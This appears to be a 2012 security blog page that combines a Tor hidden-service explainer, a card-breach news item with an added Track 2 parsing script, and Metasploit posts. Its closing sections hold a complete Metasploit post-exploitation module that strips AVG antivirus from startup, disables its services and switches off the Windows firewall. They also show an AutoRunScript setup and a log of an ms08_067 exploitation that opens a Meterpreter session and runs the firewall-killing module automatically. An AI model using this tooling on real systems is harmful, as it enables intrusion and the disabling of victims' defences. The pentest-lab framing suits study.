Friday, 15 June 2012

What Are ToR Hidden Services?

gAtO's thoughts: Anonymity serves different interests for different user groups. To a private citizen it's privacy; to a business it's a network-security issue.
A business needs to protect trade secrets and let its IP (knowledge-base data centers) communicate with vendors securely, and we all know that a business needs to keep an eye on its competition.
The competition can check your stats (http://www.alexa.com/siteinfo/uscyberlabs.com) and see how your business is doing, what keywords you're using, the demographics of the users hitting your site, and so on.
By the way, in the Tor .onion network a web site or service does not give that away unless you want it to: the server's address is never exposed to its visitors, although anyone who knows the .onion address can still see what the service serves.
How would a government use a Tor network? I'm asked that all the time...
If I were a state actor (agent, business or person) doing business in China (and other countries too), I would use a Tor .onion connection to keep my business private from a government that is known to snoop a bit on travelers to its country.
The fact is, governments need anonymity for their security. Think about it: "What does the CIA Google for?" Maybe they use Tor??? But this is about hidden services, right?
What is a hidden service in the Tor .onion network?
Simply put, it's a web site or service, a place in the Tor network, where we have services like:

  • Search engines
  • Directories
  • Web / POP3 email
  • Private messages (PM)
  • Drop boxes
  • Remailers
  • Bulletin boards (BBS)
  • Image boards
  • Currency exchange
  • Blogs
  • E-commerce
  • Social networks
  • Micro-blogs
Hidden services are called "hidden" because the service's IP address in Tor is hidden: the people using it cannot see the IP of your server, so they cannot trace it back to you. If they can't find you, how are they going to hack you? Sorry, I had to say that (more about that later).
Now, how do I keep my IP secret and still let you use my services? On the normal web, if you're at uscyberlabs.com you are on my site, on my server, so you can resolve the name, run a WHOIS and get my IP and geolocation. Then you can hit my website with DDoS and other IP-level attack vectors, and since you have my location you can physically find me, my server and my website, and maybe go dumpster diving in the trash for my company secrets. mAyBe sI, nO.
Well, in the Tor .onion network you, the client, ask the business website whether you can use its services through one of its introduction points, and then the two of us meet at a rendezvous point, an OR (onion router) that each side reaches over its own multi-hop circuit. We meet at that relay, not at my server or my IP, so you are never on the business's server while you're in OnionLand; you can't do a WHOIS and get my IP, because we only ever met at an OR, and you cannot find my geolocation.
We have heard in the news of Iranian and Syrian rebels being killed. When an Iranian rebel is fighting for his life and his family's life, if the government finds his IP, or the IP of the website he visited, they will hunt that person down, and the Iranian police or government may kill the whole family. So keeping an IP from someone is not an evil act; it is an act of privacy for the safety of both sides, the client and the business.
Now let's focus on R2, the OR marked with the yellow key in the diagram. That's the spot where you (your company's hidden website) and your client meet. I know it's a sneaky way of doing business, but once again, if they can't get at your IP, that is one attack vector that can't be used to hack you or DDoS you. They can still hack you, but then it has to be through the software you run.
How it's all done, the magic, the technical part, is below; this is just an outline of the events in the client / hidden service protocol:



It goes something like this (cell names as in Tor's rendezvous spec; the service-side setup comes first, then the client's connection):

  • Service: sends an ESTABLISH_INTRO cell to each relay it picks as an introduction point; the relay answers INTRO_ESTABLISHED. The service then publishes its descriptor (introduction points plus its public key) to the hidden service directories.

  • Client: fetches the descriptor, picks a rendezvous point and sends it an ESTABLISH_RENDEZVOUS cell carrying a fresh rendezvous cookie; the relay answers RENDEZVOUS_ESTABLISHED.

  • Client: sends an INTRODUCE1 cell to one of the introduction points, naming the rendezvous point and carrying the cookie and the client's half of a Diffie-Hellman handshake, encrypted to the service's key.

  • Introduction point: relays that payload to the service as an INTRODUCE2 cell and answers the client with INTRODUCE_ACK.

  • Service: builds its own circuit to the rendezvous point and sends a RENDEZVOUS1 cell with the cookie, its half of the handshake and a hash of the resulting key.

  • Rendezvous point: matches the cookie to the waiting client circuit, splices the two circuits together and forwards the service's half to the client as a RENDEZVOUS2 cell.

  • Both sides now share a key and the client's ordinary requests (a chat, a blog, whatever the service offers) flow over the joined circuit.
More geek network kinda stuff. This is the service side in Tor's own log, from establishing an introduction point to publishing the descriptor:
Jun 03 20:50:02.100 [notice] Tor 0.2.1.0-alpha-dev (r14739) opening new log file.
Jun 03 20:50:11.151 [notice] We now have enough directory information to build circuits.
Jun 03 20:50:12.697 [info] rend_services_introduce(): Giving up on sabotage as intro point for stuptdu2qait65zm.
Jun 03 20:50:18.633 [info] rend_service_intro_established(): Received INTRO_ESTABLISHED cell on circuit 1560 for service stuptdu2qait65zm
Jun 03 20:51:18.997 [info] upload_service_descriptor(): Sending publish request for hidden service stuptdu2qait65zm
Jun 03 20:51:22.878 [info] connection_dir_client_reached_eof(): Uploaded rendezvous descriptor (status 200 ("Service descriptor stored"))
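The exchange outlined above, modelled in Ruby as an added example (this is not Tor's code or the author's). Four parties trade the cells named in the list: a client, an introduction point, a rendezvous point and the hidden service. Each relay records only the previous hop on each circuit, so at the end we can check what the rendezvous point could actually have learned, which is the whole point of meeting at an OR instead of at the server. The addresses, relay names and the tiny Diffie-Hellman group are constructed for readability; Tor's real handshake used a 1024-bit group and onion-encrypts every hop.

```ruby
require 'digest'
require 'securerandom'

# Toy DH group: a small Mersenne prime so the numbers stay readable.
# Tor used a 1024-bit group here; this size is NOT secure.
P = 2**127 - 1
G = 5

def dh_keypair
  x = SecureRandom.random_number(P - 2) + 1
  [x, G.pow(x, P)]
end

# KH in the rendezvous spec: a hash over the DH shared secret, sent in
# RENDEZVOUS1 so the client can confirm both sides derived the same key.
def handshake_hash(shared)
  Digest::SHA256.digest(shared.to_s)
end

class Relay
  attr_reader :prev_hops
  def initialize(name)
    @name = name
    @prev_hops = []          # addresses this relay saw as the previous hop
  end
end

class RendezvousPoint < Relay
  def initialize(name)
    super
    @waiting = {}            # rendezvous cookie -> the client's circuit
  end

  def establish_rendezvous(cookie, client_circ)
    @prev_hops << client_circ[:prev_hop]
    @waiting[cookie] = client_circ
    'RENDEZVOUS_ESTABLISHED'
  end

  def rendezvous1(cookie, g_y, kh, service_circ)
    @prev_hops << service_circ[:prev_hop]
    client_circ = @waiting.delete(cookie)
    return nil if client_circ.nil?          # unknown cookie: cell is dropped
    # Splice the two circuits and pass the service's half of the handshake
    # to the client as RENDEZVOUS2. The relay holds no private DH value.
    client_circ[:inbox] << ['RENDEZVOUS2', g_y, kh]
    'spliced'
  end
end

class IntroductionPoint < Relay
  def initialize(name, service)
    super(name)
    @service = service
  end

  # Relay the payload to the service as INTRODUCE2 and acknowledge to the
  # client. In Tor the payload is encrypted to the service's key; it is
  # passed through in the clear here only to keep the model short.
  def introduce1(payload, client_circ)
    @prev_hops << client_circ[:prev_hop]
    @service.introduce2(payload)
    'INTRODUCE_ACK'
  end
end

class HiddenService
  attr_reader :addr, :key
  def initialize(addr)
    @addr = addr
  end

  def introduce2(payload)
    y, g_y = dh_keypair
    @key = handshake_hash(payload[:g_x].pow(y, P))
    # The service opens its own circuit to the rendezvous point, so the RP
    # sees the service's last middle relay and never @addr.
    payload[:rp].rendezvous1(payload[:cookie], g_y, @key,
                             { prev_hop: 'service-middle-relay' })
  end
end

def run_handshake
  service = HiddenService.new('203.0.113.7')           # constructed address
  intro   = IntroductionPoint.new('intro-relay', service)
  rp      = RendezvousPoint.new('rendezvous-relay')
  client_addr = '198.51.100.22'                         # constructed address
  client_circ = { prev_hop: 'client-middle-relay', inbox: [] }

  cookie = SecureRandom.random_bytes(20)                # the rendezvous cookie
  x, g_x = dh_keypair
  rp.establish_rendezvous(cookie, client_circ)          # ESTABLISH_RENDEZVOUS
  intro.introduce1({ rp: rp, cookie: cookie, g_x: g_x }, client_circ) # INTRODUCE1

  cell, g_y, kh = client_circ[:inbox].shift             # RENDEZVOUS2 arrives
  client_key = handshake_hash(g_y.pow(x, P))
  { cell: cell, keys_match: (client_key == kh && kh == service.key),
    rp_saw: rp.prev_hops, intro_saw: intro.prev_hops,
    client_addr: client_addr, service_addr: service.addr }
end

# A RENDEZVOUS1 whose cookie matches no waiting client is silently dropped
def bad_cookie_dropped?
  rp = RendezvousPoint.new('rendezvous-relay')
  rp.establish_rendezvous('A' * 20, { prev_hop: 'm1', inbox: [] })
  rp.rendezvous1('B' * 20, 1, '', { prev_hop: 'm2' }).nil?
end
```

Run `run_handshake` and inspect `:rp_saw`: the rendezvous relay has only ever talked to the two middle relays, so it cannot name either endpoint, yet both ends finish with the same key. Drop the cookie check and any party who guesses the cookie could be spliced onto the client's circuit, which is why the cookie is fresh per connection.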
People ask me how these hidden services can be attacked.
It's all the same as on the surface web: you find out what software the hidden service is running (let's say WordPress or FlatPress), and if it's an old version with known vulnerabilities, the site can be hacked through the traditional attack vectors. Hiding the IP removes the network-level attacks; it does nothing about bugs in the application itself.
gAtO can't wait till USCyberLabs.com has a sandbox in the .onion where we can run a honeypot for people to hack and learn from (we need funding for these projects).
gAtO has not tried BackTrack 5 on the Tor .onion network, mAyBe sI, nO. uscyberlabs.com has been hacked a few times already and is constantly fighting bots and spammers, and so it goes everywhere...
Here are some technologies used in the ToR-.onion network:
Anyway, I hope this clears up the mystery of a hidden service in Tor: it's just a website, you go to a rendezvous point and do your business, and neither your IP nor the business's IP is ever revealed to the other side. No digital breadcrumbs at the network layer.
Now a word to the wise: in the Tor .onion network you have some very tech-savvy people and some very stupid ones, so always be a critical cyber user.
gAtO oUt...
Cross-posted from US Cyber Labs
Copyright 2010 Respective Author at Infosec Island

Global Payments Inc -Security Breach Compromised 1.5 Million of Visa and MasterCard



Earlier this year cyber criminals breached the systems of Global Payments Inc., a leader in payment-processing services. At the time of the breach, experts estimated that data for more than 50,000 Visa and MasterCard cards had been stolen. Now, after its investigation, Global Payments says that no more than 1.5 million card numbers were harvested during the intrusion it disclosed earlier this year. The incident affects only North American Visa and MasterCard customers. The company has, however, provided a larger set of card numbers to the card brands so that they can proactively monitor cardholder activity. The evidence continues to indicate that the potential card exportation was limited to Track 2 data.


Track 2 is the machine-readable data on the magnetic stripe: it carries numerical fields such as the card number, the expiry date and the service code, but not the cardholder's name, which lives on Track 1. It is, however, enough to write a counterfeit magnetic-stripe card, which is why the brands monitor the affected numbers for fraud rather than treating the loss as harmless.
Additionally, Global Payments says that it believes not all of the nearly 1.5 million cards have been compromised. The payment processor has nevertheless notified the card companies of all potentially affected numbers so that they can "proactively monitor cardholder activity"; Global Payments had previously said that it might pass on further card numbers for monitoring purposes. Paul R. Garcia, Chairman and CEO of Global Payments, has apologised for the incident and said that his company is working diligently to conclude its investigation. At the end of its fiscal year in July, the company plans to present its shareholders with a final report on the incident. Once the investigation is complete, the payment processor plans to reapply as a "PCI DSS Compliant Service Provider" with MasterCard and Visa: after the incident was made public, the card companies revoked Global Payments' certification.
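Because the exposure was limited to Track 2, it helps to know exactly what that format holds. The following is an added Ruby example (not part of the article) that parses ISO/IEC 7813 Track 2 strings, checks the PAN's Luhn digit so random digit runs are not reported, masks the PAN for safe logging, and scans a constructed dump for stripe data the way a breach investigator or DLP rule would. The sample PANs are the standard test numbers, not real cards, and the dump text is constructed.

```ruby
# ';' PAN (up to 19 digits) '=' YYMM service-code (3) discretionary-data '?'
TRACK2 = /;(?<pan>\d{1,19})=(?<exp>\d{4})(?<svc>\d{3})(?<disc>\d*)\?/

# Luhn check: double every second digit from the right, fold, sum mod 10
def luhn_valid?(pan)
  sum = 0
  pan.reverse.each_char.with_index do |ch, i|
    d = ch.to_i
    if i.odd?
      d *= 2
      d -= 9 if d > 9
    end
    sum += d
  end
  (sum % 10).zero?
end

# Keep the first six (issuer) and last four digits, as PCI DSS permits
def mask_pan(pan)
  pan[0, 6] + '*' * (pan.length - 10) + pan[-4, 4]
end

# Service code first digit 2 or 6 means the card also has an EMV chip
def chip_card?(service_code)
  %w[2 6].include?(service_code[0])
end

def parse_track2(raw)
  m = TRACK2.match(raw)
  return nil if m.nil? || !luhn_valid?(m[:pan])
  {
    pan: m[:pan],
    masked: mask_pan(m[:pan]),
    expiry: m[:exp],                 # YYMM
    service_code: m[:svc],
    chip: chip_card?(m[:svc]),
    discretionary: m[:disc]          # issuer data, often PVV/CVV-type values
  }
end

# Masked PANs for every well-formed, Luhn-valid Track 2 string in text
def find_track2(text)
  text.scan(TRACK2).map(&:first)
      .select { |pan| luhn_valid?(pan) }
      .map { |pan| mask_pan(pan) }
end

# Constructed sample: two valid stripes and one with a bad check digit
SAMPLE_DUMP = <<~DUMP
  POS terminal log ... stripe read ok
  ;4111111111111111=25121011234567890?
  ;4111111111111112=2512101?
  ;5500000000000004=26062011234567890?
DUMP

if __FILE__ == $0
  find_track2(SAMPLE_DUMP).each { |masked| puts "Track 2 PAN found: #{masked}" }
end
```

Note that nothing in the parsed record names the cardholder, matching what the notice says about Track 2; everything needed to clone a stripe is still there.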

Wednesday, 13 June 2012

Fixing db_nmap misidentified operating systems inside the metasploit host database

I was doing some scanning the other day against my test lab of VMs. I noticed that nmap and db_nmap were seeing my Windows XP machine as Server 2003. Nmap identified its OS details as "Microsoft Windows XP Professional SP2 or Windows Server 2003". When that is placed inside the Metasploit db, the host gets the os_flavor 2003. This could be a problem depending on resource scripts, or when you attempt to use an exploit against the box.
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
443/tcp  open  https?
|_ssl-cert: ERROR
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds <=========
1027/tcp open  msrpc         Microsoft Windows RPC
1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00; RTM
3389/tcp open  microsoft-rdp Microsoft Terminal Service
MAC Address: 00:0C:29:91:D5:28 (VMware)


The scan shows 445/tcp and clearly says XP.

Here is that same machine’s info inside the database.

msf > hosts

Hosts
=====

address        mac                name            os_name            os_flavor  os_sp  purpose  info  comments
-------        ---                ----            -------            ---------  -----  -------  ----  --------
10.10.101.3    00:0c:29:5f:4f:b7  dc1             Microsoft Windows  2003       SP1    server         
10.10.101.5                       ns              Linux              Ubuntu            server         
10.10.101.8    00:0c:29:60:8a:e8  dc2             Microsoft Windows  2008              server         
10.10.101.11   00:0c:29:d4:bc:0d  winxpsp3-vm     Microsoft Windows  2003 <==== SP3    client 
10.10.101.109                                     Linux              Ubuntu            server         
10.10.101.110                                     Linux              Ubuntu            server         
10.10.101.111                     metasploitable  Unknown                              device         


Now the question is how do we fix this?

Start msfconsole and type irb.

msf > irb
[*] Starting IRB shell...

>> 


Now type:

host = framework.db.workspace.hosts.find_by_address("10.10.101.11")
host.os_flavor="XP"
host.save
exit


Change 10.10.101.11 to the IP address of the host you are trying to modify.

Now run the hosts command and see that the flavor is corrected.
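Generalizing the one-host fix above, here is an added example in plain Ruby (not from the post and not Metasploit's own code): reconcile os_flavor from the 445/tcp microsoft-ds banner, which names the exact Windows version where nmap's OS fingerprint only says "XP SP2 or Server 2003". The host and service records are constructed to mirror the table above. The branch guarded by defined?(framework) shows how the same logic would be applied from msfconsole's irb; it assumes the 2012-era accessors framework.db.workspace.hosts and .services with address, os_name, os_flavor, port and info attributes, which is an assumption about the database model rather than something the post shows.

```ruby
# Checked in order. The ambiguous "2003 or 2008" banner deliberately maps to
# nil so the fix never swaps one guess for another.
BANNER_FLAVORS = [
  [/Windows 2003 or 2008/i,   nil],
  [/Windows XP/i,             'XP'],
  [/Windows 2000/i,           '2000'],
  [/Windows (Server )?2003/i, '2003'],
  [/Windows Vista/i,          'Vista'],
  [/Windows 7/i,              '7'],
  [/Windows (Server )?2008/i, '2008']
]

def flavor_from_banner(banner)
  BANNER_FLAVORS.each { |re, flavor| return flavor if banner =~ re }
  nil
end

# hosts:    [{address:, os_name:, os_flavor:}]
# services: [{address:, port:, name:, info:}]
# Updates os_flavor in place and returns the list of changes made.
def reconcile_flavors(hosts, services)
  changes = []
  hosts.each do |h|
    next unless h[:os_name].to_s =~ /Windows/i
    smb = services.find { |s| s[:address] == h[:address] && s[:port] == 445 }
    next if smb.nil?
    wanted = flavor_from_banner(smb[:info].to_s)
    next if wanted.nil? || wanted == h[:os_flavor]
    changes << { address: h[:address], from: h[:os_flavor], to: wanted }
    h[:os_flavor] = wanted
  end
  changes
end

# Constructed records mirroring the post's hosts table and nmap output
SAMPLE_HOSTS = [
  { address: '10.10.101.3',  os_name: 'Microsoft Windows', os_flavor: '2003' },
  { address: '10.10.101.11', os_name: 'Microsoft Windows', os_flavor: '2003' },
  { address: '10.10.101.5',  os_name: 'Linux',             os_flavor: 'Ubuntu' }
]
SAMPLE_SERVICES = [
  { address: '10.10.101.3',  port: 445, name: 'microsoft-ds',
    info: 'Microsoft Windows 2003 or 2008 microsoft-ds' },
  { address: '10.10.101.11', port: 445, name: 'microsoft-ds',
    info: 'Microsoft Windows XP microsoft-ds' }
]

def demo_changes
  hosts = Marshal.load(Marshal.dump(SAMPLE_HOSTS))   # work on a copy
  reconcile_flavors(hosts, SAMPLE_SERVICES)
end

if defined?(framework)
  # Inside msfconsole's irb (assumed accessors): pull records, fix, save.
  ws = framework.db.workspace
  hosts = ws.hosts.map do |h|
    { address: h.address, os_name: h.os_name, os_flavor: h.os_flavor, rec: h }
  end
  services = ws.services.map do |s|
    { address: s.host.address, port: s.port, name: s.name, info: s.info }
  end
  reconcile_flavors(hosts, services).each do |c|
    rec = hosts.find { |h| h[:address] == c[:address] }[:rec]
    rec.os_flavor = c[:to]
    rec.save
    puts "#{c[:address]}: os_flavor #{c[:from]} -> #{c[:to]}"
  end
else
  demo_changes.each { |c| puts "#{c[:address]}: os_flavor #{c[:from]} -> #{c[:to]}" }
end
```

Only the XP box changes; dc1's "2003 or 2008" banner is no more specific than the fingerprint, so it is left alone for you to resolve by hand.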

Killing AVG2012

I was re-watching/restudying some of the videos for Metasploit Framework Expert. One video in particular, "Lesson 7: Post Exploitation Kill AV and Bypass Firewall", made me decide to automate the task with a post-exploitation module.
##
# $Id: kill_avg_2012.rb 2012-05-12 02:19:00Z $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/post/common'
require 'msf/core/post/windows/registry'

class Metasploit3 < Msf::Post

  include Msf::Post::Windows::Registry
  include Msf::Post::Common

  # Registry "Start" values for a Windows service
  SERVICE_AUTO     = 2
  SERVICE_DISABLED = 4

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Windows Manage Stop AVG',
      'Description'   => %q{
        This module removes the AVG tray from starting in the registry. It also
        changes the startup mode of the avgwd (AVG watchdog) and AVGIDSAgent
        services from automatic to disabled, and can optionally turn off the
        Windows firewall and reboot the host so the changes take effect.
      },
      'License'       => BSD_LICENSE,
      'Author'        => [ '3vi1john Jbabio@me.com' ],
      'Version'       => '$Revision: 20 $',
      'Platform'      => [ 'windows' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))

    register_options(
      [
        OptBool.new('REBOOT', [ false, 'Reboot the host after making the changes', false ]),
        OptBool.new('KILLFW', [ false, 'Turn the Windows firewall off', true ])
      ], self.class)
  end

  # Remove the AVG tray autostart entry. On x64 the 32-bit AVG installer
  # writes under Wow6432Node, so the caller passes the matching Run key.
  def rem_avg_tray(key)
    value = 'AVG_TRAY'
    print_status 'Checking for AVG Tray...'
    v = registry_getvaldata(key, value)
    # Match on the binary name rather than one exact install path
    if v.to_s =~ /avgtray\.exe/i
      print_status "\tAVG_TRAY found (#{v}); removing it..."
      registry_deleteval(key, value)
    else
      print_status "\tAVG_TRAY is already gone..."
    end
  rescue ::Exception => e
    print_status "\tThe following error was encountered: #{e.class} #{e}"
  end

  # Set a service's start type to disabled if it is currently automatic
  def disable_service(name)
    key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{name}"
    v = registry_getvaldata(key, 'Start')
    if v == SERVICE_AUTO
      print_status "\tService #{name} is set to Auto..."
      print_status "\tChanging #{name} service from auto to disabled..."
      cmd_exec('sc', "config #{name} start= disabled", 30)
    elsif v == SERVICE_DISABLED
      print_status "\tService #{name} is already disabled..."
    else
      print_status "\tService #{name} has Start=#{v.inspect}; leaving it alone..."
    end
  rescue ::Exception => e
    print_status "\tThe following error was encountered: #{e.class} #{e}"
  end

  def rem_avg_services
    disable_service('avgwd')
    disable_service('AVGIDSAgent')
  end

  def kill_firewall
    sysnfo = client.sys.config.sysinfo['OS']
    if sysnfo =~ /Windows XP/
      print_status "\tKilling #{sysnfo} Firewall..."
      cmd_exec('netsh', 'firewall set opmode mode=disable', 30)
    elsif sysnfo =~ /Windows 7|Server 2008|Windows Vista/
      print_status "\tKilling #{sysnfo} Firewall..."
      cmd_exec('netsh', 'advfirewall set allprofiles state off', 30)
    else
      print_status "\tUnrecognised OS #{sysnfo}; not touching the firewall..."
    end
  rescue ::Exception => e
    print_status "\tThe following error was encountered: #{e.class} #{e}"
  end

  def run
    arch = client.sys.config.sysinfo['Architecture']
    if arch =~ /x64/
      rem_avg_tray("HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run")
    else
      rem_avg_tray("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run")
    end
    rem_avg_services

    kill_firewall if datastore['KILLFW']

    # Reboot last, after every other change has been made
    if datastore['REBOOT']
      print_status "\tRebooting..."
      session.console.run_single('reboot')
    end
    print_status "\tDone!"
  rescue ::Exception => e
    print_status("The following error was encountered: #{e.class} #{e}")
  end

end

Automation is the name of the pentest game

Metasploit AutoRunScripts are great when you need a module to run automatically after exploitation. Getting a single script to run once Meterpreter is up is pretty easy, but what if you want multiple post scripts to run? From the msfconsole prompt run: set AutoRunScript multi_console_command -rc "path/name of rc file"


msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc


Inside of the rc file just list the commands one by one like so:

run post/windows/manage/migrate

run post/windows/manage/killfw

run post/windows/gather/checkvm


Now save the file autoruncommands.rc in the root folder. Don't use killfw, because you won't find it in your install; it is a module I wrote to automatically kill the Windows firewall.
Now let's watch it in action:


msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.200.40:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.101.11
[*] Meterpreter session 6 opened (10.10.200.40:4444 -> 10.10.101.11:1125) at 2012-04-22 17:58:16 -0400

meterpreter > 
[*] Session ID 6 (10.10.200.40:4444 -> 10.10.101.11:1125) processing AutoRunScript 'multi_console_command -rc /root/autoruncommands.rc'
[*] Running Command List ...
[*]  Running command run post/windows/manage/migrate
[*] Running module against XPVM-SP2
[*] Current server process: svchost.exe (1324)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process 3984
[*]  Running command run post/windows/manage/killfw
[+] Killing Windows Firewall...
[+] Done!
[*]  Running command run post/windows/gather/checkvm
[*] Checking if XPVM-SP2 is a Virtual Machine .....
[*] This is a VMware Virtual Machine